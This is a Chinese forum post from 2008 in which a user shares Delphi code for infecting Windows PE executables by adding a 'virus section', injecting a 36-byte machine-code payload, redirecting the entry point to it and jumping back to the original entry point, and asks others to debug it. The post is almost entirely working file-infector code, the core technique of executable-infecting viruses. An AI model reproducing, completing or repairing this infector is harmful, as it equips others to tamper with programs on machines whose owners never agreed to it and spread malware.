标题:一个添加病毒节感染PE例子出的问题
只看楼主
夜神月
Rank: 1
等 级:新手上路
帖 子:60
专家分:0
注 册:2007-3-11
 问题点数:0 回复次数:0 
一个添加病毒节感染PE例子出的问题
前几天参考着一个例子 写了一个感染PE的例子 添加病毒节  修改入口地址不过经我测试有问题
希望哪位大牛 对这方面有所了解的 指点一下 小弟 感激不尽



MyCode:array[0..35] of byte=($6A,$40,$E8,$06,$00,$00,$00,$78,
                               $34,$68,$00,$EB,$09,$E8,$04,$00,
                               $00,$00,$78,$34,$68,$00,$6A,$00,
                               $B8,$8A,$05,$D5,$77,$FF,$D0,$e9,
                               $00,$00,$00,$00);

implementation

{$R *.dfm}

///////////////////////////////////////////////////

function MyAlign(size,AlignNum:integer):integer;
var
  ret,BaseNum:integer;
begin
  result:=0;
  if boolean(size=0) or boolean(AlignNum=0) then Exit;
  BaseNum:=size mod AlignNum;
  if BaseNum<>0 then //有余数
    ret:=((size div AlignNum)+1)*AlignNum
  else
    ret:=size;
  result:=ret;
end;
//////////////////////////////////////////////////////
function ReadData(hfile:THandle;position:dword;var buffer;buffersize:dword):boolean;
var
  tmp:cardinal;
begin
  result:=false;
  setfilepointer(hfile,position,0,0);
  readfile(hfile,buffer,buffersize,tmp,nil);
  if tmp=buffersize then
  result:=true;
end;


function WriteData(hfile:THandle;position:dword;var buffer;buffersize:dword):boolean;
var
  tmp:cardinal;
begin
  result:=false;
  setfilepointer(hfile,position,0,0);
  writefile(hfile,buffer,buffersize,tmp,nil);
  if tmp=buffersize then
  result:=true;
end;


procedure intectPE(Destfile:string);
var
  buf:pointer;
  hfile:THandle;
  MyDosHeader:PImageDosHeader;
  MyNtHeaders:PImageNtHeaders;
  MySectionheader,NewSectionheader:PImageSectionHeader;
  MyName:string;
  nFileAlignMent,nSectionAlignMent,nSectionCount:integer;
  dwOldOEP,MyAddress,hFilesize:Dword;
begin
  hFile:=createfile(pchar(DestFile),
                    GENERIC_READ or GENERIC_WRITE,
                    0,
                    nil,
                    OPEN_EXISTING,
                    FILE_ATTRIBUTE_NORMAL,
                    0);
  if hFile=INVALID_HANDLE_VALUE then showmessage('打开错误');
//申请内存;
//  hfilesize:=getfilesize(hfile,nil);
  getmem(MyDosHeader,sizeof(TImageDosHeader));
  getmem(MyNtHeaders,sizeof(TImageNtHeaders));
  getmem(MySectionheader,sizeof(TImageSectionHeader));
  getmem(NewSectionheader,sizeof(TImageSectionHeader));
  if not readdata(hfile,0,MyDosHeader^,sizeof(TImageDosHeader)) then
  showmessage('读DOS头错误');
  if not readdata(hfile,MyDosHeader^._lfanew,MyNtHeaders^,sizeof(TImageNtHeaders)) then
  showmessage('读Nt头错误');
  nSectionCount:=MyNtHeaders.FileHeader.NumberOfSections;
  dwOldOEP:=MyNtHEADERS^.OptionalHeader.AddressOfEntryPoint;
  nFileAlignMent:=MyNtHEADERS^.OptionalHeader.FileAlignment;
  nSectionAlignMent:=MyNtHEADERS^.OptionalHeader.SectionAlignment;


  if not readdata(hfile,mydosheader^._lfanew+sizeof(TImageNtHeaders)+(MyNtHeaders^.FileHeader.NumberOfSections-1)*sizeof(TImageSectionHeader),MySectionheader^,sizeof(TImageSectionHeader)) then


 showmessage('读最后一个节错误');
  //构做写入的表头
  MyName:='.xp';
  fillchar(NewSectionHeader^,sizeof(TImageSectionHeader),#0);
  move(MyName[1],NewSectionHeader^.Name[0],length(MyName));
  NewSectionheader^.VirtualAddress:=MyAlign(MySectionheader.VirtualAddress+MySectionheader.Misc.VirtualSize,nSectionAlignMent);
  NewSectionheader^.Misc.VirtualSize:=MyAlign(MyAlign(30,nFileAlignMent),nSectionAlignMent);
  NewSectionheader^.PointerToRawData:= MyAlign(MySectionheader.PointerToRawData+Mysectionheader.SizeOfRawData,nFileAlignMent);
  NewSectionheader^.SizeOfRawData:=MyAlign(sizeof(MyCode),nFileAlignMent);
  NewSectionheader^.Characteristics:=$E0000020;
  //if (hfilesize-NewSectionheader^.PointerToRawData)<MyAlign(sizeof(MyCode),nFileAlignMent) then
  //begin
 // closehandle(hfile);
  //end;
  if not writedata(hfile,mydosheader^._lfanew+sizeof(TImageNtHeaders)+nSectionCount*sizeof(TImageSectionHeader),NewSectionheader^,sizeof(TImageSectionHeader))then
  showmessage('写入新表头错误');

 // 更新Nt头信息;
  MyNtHeaders.FileHeader.NumberOfSections:=MyNtHeaders.FileHeader.NumberOfSections+1;
 //myntheaders.OptionalHeader.SizeOfHeaders:=myntheaders.OptionalHeader.SizeOfHeaders+sizeof(Timagesectionheader);
  MyNtHeaders.OptionalHeader.SizeOfCode:=MyAlign(MyNtHeaders.OptionalHeader.SizeOfCode+sizeof(MyCode),nFileAlignMent);
  MyNtHeaders.OptionalHeader.SizeOfImage:=MyNtHeaders.OptionalHeader.SizeOfImage+MyAlign(sizeof(MyCode),nSectionAlignMent);
  MyNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress:=0;
  MyNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size:=0;
  MyNtHeaders.OptionalHeader.AddressOfEntryPoint:=NewSectionheader.VirtualAddress;
  writedata(hfile,MyDosHeader^._lfanew,MyNtHeaders^,sizeof(TImageNtHeaders));
  //得到地址

  MyAddress:=0-(NewSectionheader.VirtualAddress-dwOldOEP+sizeof(MyCode));

  //showmessage(inttohex(-myaddress,4));
  MyCode[35]:=(MyAddress shr 24)and $FF;
  MyCode[34]:=(MyAddress shr 16)and $FF;
  MyCode[33]:=(MyAddress shr 8)and $FF;
  MyCode[32]:=(MyAddress      )and $FF;
  //字符串地位存字节地位;
  getmem(buf,NewSectionHeader^.SizeOfRawData);
 // showmessage(inttohex(NewSectionheader^.PointerToRawData,4));
  fillchar(buf^,NewSectionHeader^.SizeOfRawData,#0);
  if not writedata(hfile,NewSectionheader^.PointerToRawData,buf^,NewSectionHeader^.SizeOfRawData) then showmessage('aa');
  freemem(buf,NewSectionHeader^.SizeOfRawData);

 if not WriteData(hfile,NewSectionheader^.PointerToRawData,MyCode,36) then
 showmessage('写入机器码错误!');
 closehandle(hfile);

end;
搜索更多相关主题的帖子: 例子 感染 
2008-02-29 11:10



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-201382-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.580473 second(s), 8 queries.
Copyright©2004-2025, BCCN.NET, All Rights Reserved